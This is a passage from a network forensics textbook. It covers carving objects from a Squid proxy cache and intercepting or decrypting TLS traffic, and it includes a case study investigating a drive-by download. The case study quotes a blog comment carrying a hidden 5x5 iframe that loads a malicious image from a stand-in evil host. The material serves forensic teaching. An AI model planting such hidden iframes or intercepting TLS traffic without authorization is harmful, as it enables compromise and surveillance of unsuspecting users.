Opening the extracted text/html web object in a browser (offline), we see some of the page content (shown in Figure 10-8). Notice that since the browser is not connected to the Internet, it does not automatically retrieve referenced images and the embedded links will not work.

Figure 10-8 An extracted web object, viewed using the Firefox web browser (offline).

It is possible for us to search the Squid cache and retrieve any referenced images, which are also stored on disk. Let’s see if that image file, lolcatsdotcomvz4o71odbkla2v24.jpg, is in our disk cache. For this example, we simply search for the referenced URL using Linux command-line tools:

$ grep -r 'http://lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.
jpg' squid/
Binary file squid/00/00/000000F8 matches

Now let’s examine the metadata strings and HTTP header information from the matching cache file.

$ strings 00/00/000000F8 |head
http://lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg
HTTP/1.1 200 OK
Date: Tue, 14 Apr 2009 19:56:20 GMT
Server: Apache/2.2.3 (FH)
Last-Modified: Mon, 26 May 2008 11:27:13 GMT
ETag: "bd50e3-bf60-76080640"
Accept-Ranges: bytes
Content-Length: 48992
Connection: close
Content-Type: image/jpeg

From the URI and Content-Type header, this appears to be the image we’re looking for.

To extract the cached JPEG, open a hex editor and cut the Squid metadata and HTTP headers out of the file. Figure 10-9 shows the cached JPEG stored in the Squid disk cache, viewed using the Bless hex editor. Once again, to carve out the message body, cut all bytes through the “0x0D0A0D0A” marker, as shown in Figure 10-9. Notice that the characters immediately following this marker are “0xFFD8.” This corresponds with the “magic number” for JPEG images. This is good corresponding evidence that we have correctly carved out the JPEG image referred to in the URI and Content-Type header.

Figure 10-9 A JPEG image in the Squid disk cache, viewed using the Bless hex editor.

To confirm the file type, we can use the Linux “file” command:

$ file 000000F8-edited.jpg
000000F8-edited.jpg: JPEG image data, JFIF standard 1.01, comment: "CREATOR:
gd-jpeg v1.0 (using IJ"

Finally, we can open the file up in an image viewer, as shown in Figure 10-10. Voila!

Figure 10-10 The JPEG image extracted from the Squid disk cache.

As good forensic practice, it is always wise to obtain the cryptographic hash from any files you carve:

$ sha256sum 000000F8-edited
418e52142768243b83a174d3ef9587fb55ebe4b06c61f461e6097563526f651a  000000F8-
    edited

$ md5sum 000000F8-edited
e8db83aac64fec5ceb6ee7d135f13e10  000000F8-edited

10.5.2.2 Automated Squid Cache Extraction

We are on the forefront of an industry. Until now, very little has been written or developed so far to assist with extracting web objects directly from web proxy caches.

Happily, the network forensic community has been stepping up. Alan Tu, George Bakos, and Rick Smith have all contributed to development of a Squid cache extraction tool, “squid_extract_v01.pl,”²⁵ which can automatically extract the web object from a Squid cache file, or even extract all web objects from an entire Squid cache directory, as shown below:

25. A. Tu, G. Bakos, and R. Smith, “squid_extract_v01.pl,” https://forensicscontest.com/tools/squid_extract_v01.pl.

$ squid_extract_v01.pl -p squid -o extracted/

Here are the contents of the directory where squid_extract_v01.pl placed the extracted files, organized by domain:

$ ls extracted/
0.gravatar.com                      news.slashdot.org
1.gravatar.com                      pagead2.googlesyndication.com
ad.doubleclick.net                  partner.googleadservices.com
ads1.msn.com                        partners.dogtime.com
ak.imgfarm.com                      pix01.revsci.net
analytics.live.com                  pubads.g.doubleclick.net
api.search.live.com                 rmd.atdmt.com
ask.slashdot.org                    s2.wordpress.com
b.ads1.msn.com                      s3.wordpress.com
b.casalemedia.com                   s7.addthis.com
bin.clearspring.com                 s9.addthis.com
cache.amefin.com                    sansforensics.files.wordpress.com
cdn.doubleverify.com                sansforensics.wordpress.com
clients1.google.com                 search.msn.com
davidoffsecurity.com                s.fsdn.com
ds.serving-sys.com                  shots.snap.com
ec.atdmt.com                        slashdot.org
en-us.fxfeeds.mozilla.com           spa.snap.com
en.wikipedia.org                    spe.atdmt.com
extract_log.txt                     s.stats.wordpress.com
faq.files.wordpress.com             start.ubuntu.com
finickypenguin.files.wordpress.com  stats.wordpress.com
finickypenguin.wordpress.com        st.msn.com
forensics.sans.org                  suggestqueries.google.com
fpdownload2.macromedia.com          s.wordpress.com
fxfeeds.mozilla.com                 tbn2.google.com
googleads.g.doubleclick.net         tk2.stb.s-msn.com
i.ixnp.com                          tk2.stc.s-msn.com
images-origin.thinkgeek.com         tk2.stj.s-msn.com
images.slashdot.org                 upload.wikimedia.org
images.sourceforge.net              urgentq.foxnews.com
images.thinkgeek.com                video.google.com
img.youtube.com                     vign_foxnews-news.baynote.net
jhamcorp.com                        www.controlscan.com
js.adsonar.com                      www.feedburner.com
js.casalemedia.com                  www.foxbusiness.idmanagedsolutions.com
js.revsci.net                       www.foxnews.com
linux.slashdot.org                  www.google-analytics.com
lolcats.com                         www.google.com
m1.2mdn.net                         www.gravatar.com
medals.bizrate.com                  www.msn.com
media2.foxnews.com                  www.thinkgeek.com
meta.wikimedia.org                  www.wikipedia.org
msntest.serving-sys.com             yui.yahooapis.com
newsrss.bbc.co.uk

In the output directory there is also a logfile, which by default lists the original cache file and the corresponding URI:

$ head extracted/extract_log.txt
working file: squid/00/00/00000001
Extracting http://www.msn.com/

working file: squid/00/00/00000002
Extracting http://tk2.stc.s-msn.com/br/hp/11/en-us/css/b_7_s.css

working file: squid/00/00/00000003
Extracting http://ads1.msn.com/library/dap.js

working file: squid/00/00/00000004

Let’s check to see if the automated squid extract v01.pl tool correctly carved out the JPEG image file we manually extracted earlier. First, we will check the file’s magic number:

$ file extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg
extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg: JPEG
image data, JFIF standard 1.01, comment: "CREATOR: gd-jpeg v1.0 (using IJ"

Next, let’s take the cryptographic checksums:

$ sha256sum extracted/lolcats.com/images/u/08/22/
    lolcatsdotcomvz4o71odbkla2v24.jpg
418e52142768243b83a174d3ef9587fb55ebe4b06c61f461e6097563526f651a  extracted/
    lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg

$ md5sum extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.
    jpg
e8db83aac64fec5ceb6ee7d135f13e10  extracted/lolcats.com/images/u/08/22/
    lolcatsdotcomvz4o71odbkla2v24.jpg

Notice that the cryptographic hashes we obtained from carving automatically using squid extract v01.pl match the ones we obtained earlier when we extracted the corresponding web objects manually.

10.6 Encrypted Web Traffic

Encryption of files at rest is a well-known problem in traditional hard drive forensics. Forensic investigators are often called upon to analyze hard drives or files that are partially or fully encrypted. As an investigator, dealing with encryption can be the most difficult challenge. Much has been written about how to deal with this issue when encryption is used at rest, from memory analysis techniques for recovering passwords and full-volume encryption keys, to the sophisticated techniques described in XKCD (Figure 10-11).

Figure 10-11 An “XKCD” cartoon describing advanced techniques for recovering encrypted data. By Randall Munroe, xkcd.com.²⁶

26. Randall Munroe, “xkcd: Security,” 2011, http://xkcd.com/538/.

Encryption on the wire poses the same types of challenges for network forensic investigators. In particular, an increasing percentage of web traffic is encrypted, using TLS/SSL or other means. This can make it difficult for enterprises to routinely filter inbound and outbound content, scan downloads for malware, ensure that appropriate use policies are followed, check uploads for proprietary information, and more.

There are several contributing factors that have led to the rise in encrypted web transactions:

• Industry regulations such as PCI, as well as government regulations such as HIPAA, require that sensitive information must be protected by encryption in transit. Since the web is a very convenient medium for conducting financial transactions and exchanging personal, financial, and even medical information, easy-to-use encryption schemes are becoming widespread.

• Employees seeking to browse private and/or insider attackers on company networks may leverage encryption to disguise their web activity.

• Malware authors and distributors often use encryption to disguise their payloads and/or subsequent communications channels.

As you can see, encryption is a tool. Like any tool, it can be used to protect legitimate personal and business interests, or it can be misused to help circumvent organizational policies and undermine fair business practices.

Network forensic investigators may be called upon:

• To identify encrypted web traffic, examine the endpoints, volume, and flow data, and determine the associated risk to the organization and likelihood of legitimate/illegitimate use.

• To evaluate the effectiveness of a web traffic encryption scheme.

• To circumvent or break an encryption scheme and gain access to content that one or both endpoints of communication intended to be confidential.

10.6.1 Transport Layer Security (TLS)

The Transport Layer Security (TLS) protocol is an IETF standard designed to “provide communications security over the Internet.”²⁷ Its predecessor, the Secure Socket Layer protocol (SSL), was originally developed by Netscape Corporation during the early 1990s. In 1999, the IETF published TLS 1.0, which was designed to improve upon SSL.²⁸ Since then, the development and adoption of TLS has continued and become widespread, particularly to provide security for web applications.²⁹ Although Netscape patented the SSL protocol, it has granted the public a royalty-free license to use SSL and TLS, which is based on it.

27. T. Dierks and E. Rescorla, “RFC 5246—The Transport Layer Security (TLS) Protocol Version 1.2,” IETF, August 2008, http://rfc-editor.org/rfc/rfc5246.txt.

28. T. Dierks and C. Allen, “RFC 2246—The TLS Protocol Version 1.0,” IETF, January 1999, http://rfceditor.org/rfc/rfc2246.txt.

29. T. Dierks and E. Rescorla, “RFC 5246—The Transport Layer Security (TLS) Protocol Version 1.2,” IETF, August 2008, http://rfc-editor.org/rfc/rfc5246.txt.

Despite it’s name, TLS is not a transport-layer protocol. Rather, it is designed to be layered on top of a transport-layer protocol such as TCP in order to provide cryptographic security for higher-layer applications.

In web applications, TLS is commonly used for two purposes:

• To provide confidentiality and integrity of data in transit between the web client and web server.

• To provide a means by which web clients can verify the identity of the web server with which they are communicating (and vice versa, although more rarely).

10.6.1.1 How TLS/SSL Works

TLS is the world’s most common framework for implementation of public-key cryptography. All modern browsers are distributed with built-in certificates for trusted certificate authorities (CAs) such as Verisign (see Figure 10-12). Web servers present their digitally signed certificates to web clients, which in turn use certificates from trusted CAs to verify the identity of the web server.

Figure 10-12 A screenshot of part of a Certificate Authority’s certificate, “VeriSign Class 3 Public Primary Certification Authority—G5.” This certificate is distributed with many modern browsers (in this case, Opera).

According to the X.509 specification,³⁰ “the CA certifies the binding between the public key material and the subject of the certificate.” Each certificate includes information such as the certificate subject, issuer, dates of validity, the issuer’s public key, and the cryptographic algorithms used. A certificate authority verifies the accuracy of the information in the certificate, and then uses its own private key to compute a digital signature of the information contained in the certificate. This digital signature is distributed as part of the certificate itself to allow for later verification.

30. D. Cooper, “RFC 5280—Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile,” IETF, May 2008, http://www.rfc-editor.org/rfc/rfc5280.txt.

To implement the TLS protocol, each web server has a public key and a private key. When a client contacts the server:

• The client and server agree on the protocol version and algorithms to be used.

• The server sends the client a certificate that includes its public key and information about the server (including its canonical name). A digital signature is attached to the certificate. The purpose of the digital signature is to enable the client to cryptographically verify the validity of the information in the certificate itself, including the server’s public key.

• The client optionally provides its certificate to the server for client authentication.

• The client computes a cryptographic hash of the information in the web server’s certificate. It then uses the public key of the appropriate certificate authority to check the digital signature of the cryptographic hash.

• The client checks that the certificate is currently valid and that the host name listed in the certificate matches the web server’s host name.

• The client uses the web server’s public key to encrypt a random secret number, known as the “premaster secret,” and sends it to the web server. The web server uses its private key to decrypt the message and retrieve the premaster secret, which is now shared only by the client and server. The shared premaster secret is used as the basis to generate session keys for subsequent symmetric key encryption of communications.³¹

31. Jeff Moser, “Moserware: The First Few Milliseconds of an HTTPS Connection,” June 10, 2009, http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html.

10.6.2 Gaining Access to Encrypted Content

If you need to gain access to the content of web application communications encrypted with TLS/SSL (and you have the legal authority to do so), there are two general approaches. First, in some cases you can capture traffic and use the server’s private key to recover the session keys and decrypt the contents (depending on the method of key exchange). This requires that you have access to the server’s private key either before or after the traffic capture.

Second, you can intercept the TLS/SSL session using a proxy. If you have control of the client, you can install your own certificate authority and configure the system to trust your proxy’s certificate. Otherwise, the user of the client system may receive a warning about a potential man-in-the-middle attack.

10.6.2.1 Server’s Private Key

If you have the web server’s private key, and a TLS/SSL traffic capture in which the RSA algorithm was used for session key exchange, you can decrypt the premaster secret sent by the client and recover the session keys used as the basis for subsequent symmetric key encryption. You will need a full-content packet capture of the TLS/SSL handshake and subsequent traffic between the client and server. It is not necessary to have access to the server’s private key before obtaining the packet capture; you can capture traffic and later recover the server’s private key to use for decryption.

Be aware that this technique will work for TLS/SSL sessions that rely on RSA for key exchange, but not for sessions that use Diffie-Hellman key exchange. As noted by security researcher Erik Hjelmvik,³²

32. Erik Hjelmvik, “Facebook, SSL and Network Forensics,” January 2011, http://www.netresec.com/?page=Blog&month=2011-01&post=Facebook-SSL-and-Network-Forensics.

“There are multiple ways to perform the key exchange in SSL, but the most common ways are to either use RSA or to use ephemeral Diffie-Hellman key exchange. When RSA is used, and a passive listener is in possession of the server’s private RSA key, one can actually decode the SSL traffic. Diffie-Hellman key exchange does, on the other hand, use a scheme where a new random private key is generated for each individual session. This prevents a third-party listener, who did not participate in the key exchange, from decoding the SSL session.”

Wireshark

Wireshark can be compiled with functionality for decrypting TLS/SSL-encrypted traffic, when RSA key exchange is used and the server’s private key is known.³³ In Figure 10-13, you can see an SSL-encrypted packet capture, shown in Wireshark. Note the protocol in the Packet List window is listed as “SSLv3,” and the Packet Details window describes the contents as “Encrypted Application Data,” and there are no higher-layer protocol details listed below this.

33. “SSL—The Wireshark Wiki,” June 24, 2011, http://wiki.wireshark.org/SSL.

Figure 10-13 A packet capture of SSL-encrypted traffic, shown in Wireshark.

Figure 10-14 shows an example of Wireshark’s SSL protocol configuration window, which allows the user to provide Wireshark with a path to the server’s private key. Once the server’s private key is incorporated into Wireshark, Wireshark will automatically decrypt SSL/TLS-encrypted content. Figure 10-15 shows the same packet capture as above, after the server’s private key is used to recover the premaster secret and compute the session keys. Notice that Wireshark now lists the Protocol as “HTTP,” and in the Packet Details panel has presented “Reassembled SSL Segments” along with HTTP header information.

Figure 10-14 Wireshark’s SSL protocol configuration window, which allows the end-user to incorporate the SSL server’s private key.

Figure 10-15 A packet capture of SSL-encrypted traffic, shown in Wireshark. In this case, Wireshark has been configured to use the web server’s private key to decrypt the SSL-encrypted packet contents. Notice that the application-layer HTTP data has been recovered.

10.6.2.2 Intercepting Proxy

You can capture and inspect the contents of TLS/SSL-encrypted traffic by using a TLS/SSL proxy to intercept the traffic. To accomplish this, you first need to set up a proxy through which the client and server communications are sent. When the client sends a request to a TLS/SSL server, the server’s TLS/SSL responses are terminated at the proxy, and the proxy sets up an encrypted tunnel between the proxy and server. The proxy also provides a “spoofed” server certificate to the client and sets up a second TLS/SSL tunnel between the client and proxy. The proxy itself can then inspect the traffic in cleartext, or forward it along to another system for analysis.

Of course, the challenge is that TLS/SSL is designed to protect against this very situation: essentially, a man-in-the-middle attack against the TLS/SSL protocol. In theory, the web client should detect that the proxy’s certificate is spoofed, because it is not properly signed by a trusted CA, and present the user with a warning pop-up or similar alert. In practice, forensic investigators and authorized network personnel can prevent these warnings. When you have control over the configuration of the client, as is the case in many enterprises, you can install a locally generated, trusted CA certificate in each client’s browser. This certificate can be used by the local enterprise to digitally signed, even “spoofed” certificates provided by the intercepting proxy, which the client will then view as valid certificates. (It is also a sad state of affairs that many end-users will simply ignore security warnings and click through them, sacrificing convenience for privacy and security.)

Sslstrip

“Sslstrip” is a free, publicly available TLS/SSL interception tool by Moxie Marlin-spike, distributed under the GNU GPLv3.³⁴ Sslstrip is designed to work in conjunction with ARP spoofing or a similar method that will cause selected traffic to be run through a host under your control. (If you have control of the routers/firewall, you can simply have that traffic legitimately forwarded to your host with less risk.) Remember to set up IP forwarding on your host so that the traffic will be sent along to its final destination.

34. Moxie Marlinspike, “sslstrip,” 2011, http://www.thoughtcrime.org/software/sslstrip.

Once sslstrip receives a TLS/SSL client connection, it can:

• Connect to the real TLS/SSL site and capture the certificate information

• Generate a new certificate on the fly with an identical Distinguished Name

• Sign the new certificate with a certificate/key you have provided

• Do a TLS/SSL handshake with the client

From that point on, the traffic is TLS/SSL-encrypted between the client and sslstrip, and sslstrip and the web server. Sslstrip itself can capture the traffic in cleartext and log it.

The only caveat is that unless the client’s system trusts the interceptor’s certificate, the client will receive a pop-up indicating that the web server’s SSL certificate is not trusted.

10.6.3 Commercial TLS/SSL Interception Tools

Commercial web proxies, such as those manufactured by Blue Coat and others, can proxy not only the web traffic but also session-layer TLS/SSL traffic used in HTTPS sessions. This allows for content inspection of what would otherwise be encrypted payloads.

As an example, Blue Coat’s ProxySG includes SSL interception and content filtering features. Blue Coat’s products are based on essentially the same principles as sslstrip. Blue Coat intercepts and inspects SSL content by terminating the server’s SSL tunnel at the proxy, providing a “spoofed” certificate to the client, and setting up a second SSL tunnel between the client and proxy.

To prevent client security pop-ups, the Blue Coat Systems Deployment Guide, “Deploying the SSL Proxy,” includes the following suggestion: “When the SSL Proxy intercepts an SSL connection, it presents an emulated server certificate to the client browser. The client browser issues a security pop-up to the end-user because the browser does not trust the issuer used by the ProxySG. This pop-up does not occur if the issuer certificate used by SSL Proxy is imported as a trusted root in the client browser’s certificate store. The ProxySG makes all configured certificates available for download via its management console. You can ask end users to download the issuer certificate through Internet Explorer or Firefox and install it as a trusted CA in their browser of choice. This eliminates the certificate popup for emulated certificates ...”^{35, 36, 37, 38}

35. “Think Your SSL Traffic is Secure?,” July 3, 2006, http://directorblue.blogspot.com/2006/07/think-your-ssl-traffic-is-secure-if.html.

36. “Deploying the SSL Proxy,” Blue Coat Systems Inc., 2006, http://www.bluecoat.co.jp/downloads/manuals/SGOS_DG_4.2.x.pdf.

37. Joris Evers, “Blue Coat to Cleanse Encrypted Traffic,” CNET News, November 8, 2005, http://news.cnet.com/Blue-Coat-to-cleanse-encrypted-traffic/2100-1029_3-5940533.html.

38. “Webwasher Competitive Sheet: Web Security,” Secure Computing, n.d., http://dr0.bluesky.com.au/Vendors/Secure_Computing/Web_Gateway/WebWasher/Comparisons/WebwasherCompSheet-BlueCoat.pdf.

10.7 Conclusion

In 1989, Tim Berners-Lee proposed creating a “global hypertext system” of “[h]uman-readable information linked together in an unconstrained way.”³⁹ Since then, the World Wide Web has exploded to incorporate graphics, multimedia, interactive chat, and social networking, and pervaded nearly every aspect of modern life.

39. Tim Berners-Lee, “Information Management: A Proposal,” May 1990, http://www.w3.org/History/1989/proposal.html.

Web proxies are traditionally used inside organizations to improve performance and filter traffic. Now, we are witnessing the next evolution, in which customized, dynamic content is delivered quickly through a network of distributed caching web proxies. As their functionality increases, web proxies have become invisibly ingrained into the fabric of the World Wide Web, and into network forensic investigations as well.

In this chapter, we discussed the various types of evidence that may exist on web proxies, reviewed tools for analyzing web access logs, and demonstrated how to carve a web object out of a Squid web proxy cache. When there is an investigation involving web activity, forensic investigators should keep in mind that client web access logs and cached web objects may exist. This evidence can provide an invaluable glimpse of precisely what the client requested and when, and can even reveal the exact web object that the user received in response.

10.8 Case Study: InterOptic Saves the Planet (Part 2 of 2)

The Case: In his quest to save the planet, InterOptic has started a credit card number recycling program. “Do you have a database filled with credit card numbers, just sitting there collecting dust? Put that data to good use!” he writes on his web site. “Recycle your company’s used credit card numbers! Send us your database, and we’ll send YOU a check.”

For good measure, InterOptic decides to add some bells and whistles to the site, too ...

Meanwhile ... MacDaddy Payment Processor deployed Snort NIDS sensors to detect an array of anomalous events, both inbound and outbound. An alert was logged at 08:01:45 on 5/18/11 concerning an inbound chunk of executable code sent to port 80/tcp for inside host 192.168.1.169 from external host 172.16.16.218. Here is the alert:

[**] [1:10000648:2] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
05/18-08:01:45.591840 172.16.16.218:80 -> 192.168.1.169:2493
TCP TTL:63 TOS:0x0 ID:53309 IpLen:20 DgmLen:1127 DF
***AP*** Seq: 0x1B2C3517 Ack: 0x9F9E0666 Win: 0x1920 TcpLen: 20

We analyzed the Snort alert and determined the following likely events (see the case study in Chapter 7 for more details):

• From at least 07:45:09 MST until at least 08:15:08 MST on 5/18/11, internal host 192.168.1.169 was being used to browse external web sites, some of which delivered web bugs, which were detected and logged.

• At 08:01:45 MST, an external web server 172.16.16.218:80 delivered what it stated was a JPEG image to 192.168.1.169, which contained an unusual binary sequence that is commonly associated with buffer overflow exploits.

• The ETag in the external web server’s HTTP response was:

1238-27b-4a38236f5d880

• The MD5sum of the suspicious JPEG was:

13c303f746a0e8826b749fce56a5c126

• Less than three minutes later, at 08:04:28 MST, internal host 192.168.1.169 spent roughly 10 seconds sending crafted packets to other internal hosts on the 192.168.1.0/24 network. Based on their nonstandard nature, the packets are consistent with those used to conduct reconnaissance via scanning and operating system fingerprinting.

Challenge: You are the forensic investigator. Your mission is to:

• Examine the Squid cache and extract any cached pages/files associated with the Snort alert shown above.

• Determine whether the evidence extracted from the Squid cache corroborates our findings from the Snort logs.

• Based on web proxy access logs, gather information about the client system 192.168.1.169, including its likely operating system and the apparent interests of any users.

• Present any information you can find regarding the identity of any internal users who have been engaged in suspicious activities.

Network: The MacDaddy Payment Processor network consists of three segments:

• Internal network: 192.168.1.0/24

• DMZ: 10.1.1.0/24

• The “Internet”: 172.16.0.0/12 [Note that for the purposes of this case study, we are treating the 172.16.0.0/12 subnet as “the Internet.” In real life, this is a reserved nonroutable IP address space.]

Other domains and subnets of interest include:

• .evl—a top-level domain (TLD) used by Evil systems.

• example.com—MacDaddy Payment Processor’s local domain. [Note that for the purposes of this case study, we are treating “example.com” as a legitimate second-level domain. In real life, this is a reserved domain typically used for examples, as per RFC 2606.]

Evidence: You are provided with two files containing data to analyze:

• evidence-squid-cache.zip—A zipfile containing the Squid cache directory (“squid”) from the local web proxy, www-proxy.example.com. Helpfully, security staff inform you that since MacDaddy Payment Processor’s network connection has been slow, the web proxy is tuned to retain a lot of pages in the local cache.

• evidence-squid-logfiles.zip—Snippets of the “access.log” and “store.log” files from the local Squid web proxy, www-proxy.example.com. The access.log file contains web browsing history logs, and the store.log file contains cache storage records, both from the same time period as the NIDS alert.

10.8.1 Analysis: pwny.jpg

Lets begin by examining the Squid proxy cache for traces of the suspicious image that we found in Snort. The Squid header we received contained a pseudo-unique ETag value of “1238-27b-4a38236f5d880.” Using Linux command-line tools, we can search the Squid cache and list the cache file that contains this ETag, as shown below:

$ grep -r '1238-27b-4a38236f5d880' squid
Binary file squid/00/05/0000058A matches

It appears that the page we’re looking for is cached in the file “squid/00/05/0000058A.” Opening the cached page in “Bless,” we can find the URI of the requested cached object in the Squid metadata, as shown in Figure 10-16. It appears that the URI of the cached object was:

Figure 10-16 Opening the cached page in “Bless,” we can find the URI of the requested cached object in the Squid metadata.

http://www.evil.evl/pwny.jpg

Immediately following the metadata are the HTTP headers, as follows:

HTTP/1.1 200 OK
Date: Wed, 18 May 2011 15:01:45 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch
Last-Modified: Wed, 18 May 2011 00:46:10 GMT
ETag: "1238-27b-4a38236f5d880"
Accept-Ranges: bytes
Content-Length: 635
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

These precisely match the HTTP headers within the packet we carved earlier from the Snort tcpdump.log file, as shown in Chapter 7. From these HTTP headers, we can deduce that this Squid cache file likely contains a JPEG image 635 bytes in length.

JPEG files begin with the magic number “0xFFD8,” so we can simply search the Squid cache file for that hex sequence and cut everything before it, as you can see in Figure 10-17. We save this edited cache file as “0000058A-edited.jpg.”

Figure 10-17 JPEG files begin with the magic number “0xFFD8,” so we can simply search the Squid cache file for that hex sequence, using Bless, and cut everything before it.

Let’s check the size of this file and see if it matches the expected 635 bytes:

$ ls -l 0000058A-edited.jpg
-rwx------ 1 student student 635 2011-06-16 00:06 0000058A-edited.jpg

It does! Let’s also check the file type:

$ file 0000058A-edited.jpg
0000058A-edited.jpg: JPEG image data

The “file” command corroborates that the file we carved is a JPEG image. Let’s also take the cryptographic checksums:

$ md5sum 0000058A-edited.jpg
13c303f746a0e8826b749fce56a5c126  0000058A-edited.jpg

$ sha256sum 0000058A-edited.jpg
fc5d6f18c3ed01d2aacd64aaf1b51a539ff95c3eb6b8d2767387a67bc5fe8699  0000058A-
    edited.jpg

This is great! The MD5 and SHA256 checksums for this file, which we carved out of the local Squid cache, precisely match the checksums for the file we carved out earlier from the Snort packet capture (see Chapter 7). We were able to extract the same image from two different sources of evidence. This strengthens our case.

10.8.2 Squid Cache Page Extraction

Now, let’s see if we can find any pages that linked to the image at http://www.evil.evl/pwny.jpg. This may help us track down the activities that led to its download.

$ grep -r 'http://www.evil.evl/pwny.jpg' squid
Binary file squid/00/05/00000589 matches
Binary file squid/00/05/0000058A matches

We’ve already examined “squid/00/05/0000058A”—that’s the file that contains our actual image, pwny.jpg. Let’s take a look at the other file, “squid/00/05/00000589.” Figure 10-18 shows this file opened in the Bless hex editor. The source URI, stored in the Squid metadata at the top of the cache file, is highlighted. It is “http://sketchy.evl/?p=3.”

Figure 10-18 Squid cache file 00000589 opened in Bless. The source URI, stored in the Squid metadata, is highlighted.

Here are the HTTP headers from Squid cache file squid/00/05/00000589, as copied from the Bless ASCII representation:

HTTP/1.0 200 OK
Date: Wed, 18 May 2011 15:01:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.5
X-Pingback: http://sketchy.evl/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8

Based on the “Content-Type” HTTP header, it appears that the content of this Squid cache file is “text/html.” Let’s cut off the Squid metadata and HTTP headers in order to isolate the page content. Figure 10-19 is a screenshot of the Squid cache file 00000589 opened in the Bless hex editor, as we cut off the highlighted bytes. We will save this file as “00000589-edited.html.”

Figure 10-19 A screenshot of the Squid cache file 00000589 opened in the Bless hex editor, as we cut off the highlighted bytes.

Now let’s find the reference to “http://www.evil.evl/pwny.jpg.” Scrolling through the content of 00000589-edited.html, we see the following text [formatting modified to fit the page]:

<h3 id="comments">1 Comment</h3>
  <ol class="commentlist">
    <li class="alt1" id="comment -3"
       <div class="commentcount">
       <a href="#comment-3" title="">1</a>
       </div>
       <strong>loser</strong> // April 29th, 2011 at 2:28 am
                                     <br />
       <div class="commenttext">
       <p>luv the site! <img src='http://sketchy.evl/wp-includes/images/
           smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  hope u get
           lots of traffic lol<iframe src="http://www.evil.evl/pwny.jpg" width
           ="5px" height="5px" frameborder="0"></iframe></p>
       </div>
     </li>
  </ol>
</ol >
<h3 id="respond">Leave a Comment</h3>
<form action="http://sketchy.evl/wp-comments-post.php" method="post" id="
    commentform">

As shown above, the reference to pwny.jpg is contained within a 5px by 5px iFrame within a comment of this page. It is barely visible and automatically loads when the page is visited. The user probably never even knew it existed. Most likely, the user who posted the comment (“loser”) took advantage of a persistent cross-site scripting vulnerability in the site and included this code in a public comment.

To view the page, we have a version of Firefox running in a sandbox, with the “Work Offline” option checked. Using this, we can open the web page that we carved out of cache file 00000589, as shown in Figure 10-20. Because this file is opened in isolation without network access, the images and style sheets that would normally format this page are missing. Instead, we simply see the content of this one file rendered, alone. In the rendered web page, you can see the comment by “l0ser,” which contained a nearly invisible 5x5 pixel iFrame with a link to pwny.jpg.

Figure 10-20 A version of Firefox running in an isolated sandbox, used to open the web page carved out of cache file 00000589. This is the cached page http://sketchy.evl/?p=3. Because this file is opened in isolation, without network access, the images and style sheets that would normally format this page are missing. In the rendered web page, you can see the comment by “l0ser,” which contained a nearly invisible 5×5 pixel iFrame with a link to pwny.jpg.

Judging by the details on the web page, the comment appears to have been posted by a user called “l0ser” on “April 29, 2011 at 2:28AM.” Of course, we have no way of verifying the accuracy of this date and time (we don’t even know what time zone the remote server is located in), but we may find evidence from more reliable systems that corroborates this information.

10.8.3 Squid Access.log File

Let’s turn our attention to Squid’s access.log file, which contains a history of requests and corresponding clients. First, let’s get some general statistics about this access.log file. Figure 10-21 shows the summary page from SARG. From this summary, we can see that this access.log file is fairly small. There are two active clients, 192.168.1.170 and 192.168.1.169, which together transferred a total of 21.21M.

Figure 10-21 The summary page from SARG.

$ head -1 access.log
1305729798.958    409 192.168.1.170 TCP_MISS/200 799 HEAD http://start.ubuntu
    .com/8.04/ - DIRECT/91.189.90.41 text/html
$ tail -1 access.log
1305731725.796    143 192.168.1.169 TCP_MISS/302 562 GET http://www.gravatar.
    com/avatar.php? - DIRECT/72.233.44.61 text/html

The first entry in the access.log file occurred at 1305729798.958 (UNIX time, or number of seconds since January 1, 1970). We can convert this to human-readable time using the “date” command as follows:

$ date --utc -d @1305729798.958
Wed May 18 14:43:18 UTC 2011

From this we see that the first entry in the access.log file occurred on Wed May 18 14:43:18 UTC 2011. Similarly, we can see that the last entry occurred at 1305731725.796, which translates into “Wed May 18 15:15:25 UTC 2011,” as shown below:

$ date --utc -d @1305731725.796
Wed May 18 15:15:25 UTC 2011

It appears that the browsing in the access.log file occurred on Wednesday, May 18, 2011, beginning at 14:43:18 UTC and ending at 15:15:25 UTC. This means that the logs span a time period of just over half an hour.

Now, let’s extract only the web browsing history relating to our client of interest, 192.168.1.169. As you can see below, the resulting file of web surfing activity from 192.168.1.169 contains 1,487 entries.

$ grep '192.168.1.169' access.log > access-192.168.1.169.log

$ wc -l access-192.168.1.169.log
1487 access-192.168.1.169.log

Now, let’s check the beginning and ending timestamps for the browsing history associated with 192.168.1.169:

$ head -1 access-192.168.1.169.log
1305729883.014    144 192.168.1.169 TCP_MISS/302 737 GET http://www.microsoft
    .com/isapi/redir.dll? - DIRECT/65.55.21.250 text/html

$ tail -1 access-192.168.1.169.log
1305731725.796    143 192.168.1.169 TCP_MISS/302 562 GET http://www.gravatar.
    com/avatar.php? - DIRECT/72.233.44.61 text/html

The timestamp on the first entry is “1305729883.014.” Converting this to human-readable format, we see that this is equivalent to “Wed May 18 14:44:43 UTC 2011.” Similarly, the timestamp for the last entry is “1305731725.796,” or “Wed May 18 15:15:25 UTC 2011.”

Notice also that the first URI requested by 192.168.1.169 was:

http://www.microsoft.com/isapi/redir.dll?

The destination of this URI, microsoft.com, lends support for the theory that 192.168.1.169 is configured with Microsoft software, such as Internet Explorer and Windows.

